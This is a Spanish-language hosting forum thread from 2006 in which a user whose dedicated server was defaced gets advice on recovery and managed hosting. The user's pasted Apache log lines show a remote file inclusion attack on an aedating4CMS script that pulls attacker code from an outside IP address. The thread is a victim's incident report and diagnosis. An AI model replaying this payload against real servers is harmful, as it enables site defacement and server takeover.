me hakearon ayuda plis

oscarva · 03-sep-2006, 08:00

Bueno pues asi es, me hakearon el server dedicado :( no se como ni quien, todas mis paginas muestran un mensaje de que ha sido hakeado por estar en usa, es de uno de esos grupos fundamentalistas o algo asi y la verdad no se que hacer, por ahora tumbe el apache para que no muestre nada pero debo solucionarlo. lo extraño es que si descargo por ftp cualquier archivo desde mi server este tiene el codigo html del mensaje y no como estaba antes. esto quiere decir que cambiaron el codigo de cada archivo de mi server?

porfa ayuda gracias

Apolo · 03-sep-2006, 18:24

oscarva, lamento esto que te ha ocurrido.

Sinceramente mi mejor consejo es que (1) contrates un profesional para intentar recuperar tu equipo y (2) en adelante contrates un servidor manejado. Infortunadamente muchos como tú se dan cuenta de esta amarga manera que manejar apropiadamente un servidor es un asunto especializado. No se trata solamente de tener un panel de control para poner a funcionar unos sitios web.

No conozco ninguna empresa que te pueda ofrecer el servicio de recuperación con soporte en español, y nosotros atendemos únicamente los servidores administrados dentro de nuestra propia red. Si puedes manejarte con soporte en inglés, te recomiendo que contactes a Jeff en rackaid.com. Dile que "Apolo" de WHT forums te recomendó sus servicios. Lo no tan bueno es que sus servicios no son económicos y que mantienen muy ocupados, pero son realmente buenos.

Avísanos cualquier cosa!

Saludos!

oscarva · 03-sep-2006, 21:45

Hola apolo gracias por tu respuesta.

bueno el atake consistio en modificar todos los archivos index.php o index.html de mi servidor, intente subirlos de nuevo y arreglar momentaneamente el problema pero entonces ahora fui hakeado por un chileno que hizo exactamente lo mismo cambio los index y me dejo un mensaje diciendo que el podria ayudarme a solucionar los problemas de seguridad Xd.

me recomiendas algun proveedor en especial? economicos y manejados?
yo tengo hostforweb.com no se que tal te parece?

por otro lado sabes como se puede encontrar la vulnerabilidad? y como demonios aran para hacer este cambio? ya modifique mi pass por una muy segura pero ahun asi el chileno este me volvio a hakear.

Un abrazo

oscarva · 03-sep-2006, 21:56

Hola apolo.

weno estuve en la web que me diste pero por mas que busco no encuentro la forma de contactarlos. por otro lado no conoces algun amigo o alguien aca en colombia que me pueda ayudar en eso? te agradezco

Apolo · 03-sep-2006, 22:30

Cita:

Iniciado por oscarva

estuve en la web que me diste pero por mas que busco no encuentro la forma de contactarlos

Mira: https://www.rackaid.com/request_services.cfm

El enlace está en la página de inicio, donde dice "Service Request". :)

Saludos!

AMateos · 03-sep-2006, 23:23

Una buena compañía en servidores Fully Managed son www.allmanaged.com (Al menos, eso he escuchado)

Un saludo

WebTech · 05-sep-2006, 02:58

También podrías utilizar los servicios de www.totalserversolutions.com, incluso tienen técnicos hispanos que te pueden ayudar mucho.

Suerte!

oscarva · 05-sep-2006, 06:19

Gracias a todos por sus respuestas. voy a estudiar los que me recomendaron

oscarva · 06-sep-2006, 00:19

Hola.

bueno e estado mirando detenidamente mis logs y lo unico que he encontrado es esto:

Código:

xx.xxx.xxx.xx - - [03/Sep/2006:21:17:58 -0500] "GET /index.php/inc/cmses/aedating4CMS.php?dir%5binc%5d=http://61.19.55.250/icons/lol1.txt%3f HTTP/1.1" 302 284 "-" "libwww-perl/5.805"
xx.xxx.xxx.xx - - [03/Sep/2006:21:18:03 -0500] "GET /index.php/inc/cmses/aedating4CMS.php?dir[inc]=http://61.19.55.250/icons/lol1.txt? HTTP/1.1" 301 339 "-" "libwww-perl/5.79"
xx.xxx.xxx.xx - - [03/Sep/2006:21:18:03 -0500] "GET /index.php/inc/cmses/aedating4CMS.php?dir%5binc%5d=http://61.19.55.250/icons/lol1.txt%3f HTTP/1.1" 302 284 "-" "libwww-perl/5.79"
xx.xxx.xxx.xx - - [03/Sep/2006:21:18:04 -0500] "GET /index.php/inc/cmses/aedating4CMS.php?dir[inc]=http://61.19.55.250/icons/lol1.txt? HTTP/1.1" 301 339 "-" "libwww-perl/5.79"
xx.xxx.xxx.xx - - [03/Sep/2006:21:18:04 -0500] "GET /index.php/inc/cmses/aedating4CMS.php?dir[inc]=http://61.19.55.250/icons/lol1.txt? HTTP/1.1" 301 339 "-" "libwww-perl/5.803"

se repite esta entrada durante mas de 6 horas y esta justo en la hora en que los index de mi sitio fueron cambiados. la ip desde donde se genera la consulta no siempre es la misma, sera este el problema? recuerdo tener instado el aedating4 en un dominio de pruebas, sera que por este script fue que entraron alli estara la bulneravilidad?

Un saludo

Apolo · 06-sep-2006, 02:18

Hola oscarva,

Es muy probable que haya sido por allí. Se trata de una vulnerabilidad reportada hace muy poco, que permite incluir (include) un archivo remoto y desconozco si existe ya un parche para ello. Encuentras información del reporte en SecurityDOT:

http://securitydot.net/xpl/exploits/...0/exploit.html

Al parecer estos archivos son los que se afectan:

aedating4CMS.php
aedatingCMS.php
aedatingCMS2.php

De todas formas puedes consultar este otro recurso, pues al parecer allí dan alguna solución:

http://www.expcode.com/webapps/2006/0905/1919.html

Vuelvo a insistirte en que contrates los servicios de un profesional al respecto, pues tu servidor puede estar ya comprometido. Puede que cubras la herida, pero la infección puede estar ya por dentro.

Saludos!

oscarva · 06-sep-2006, 04:48

Hola apolo gracias por tu ayuda.

bueno trabajare en correjir el problema temporalmente para luego mirar lo del cambio de servidor.

Saludos

Apolo · 06-sep-2006, 04:51

Cita:

Iniciado por oscarva

Hola apolo gracias por tu ayuda

No hay problema, es con mucho gusto

Saludos. :)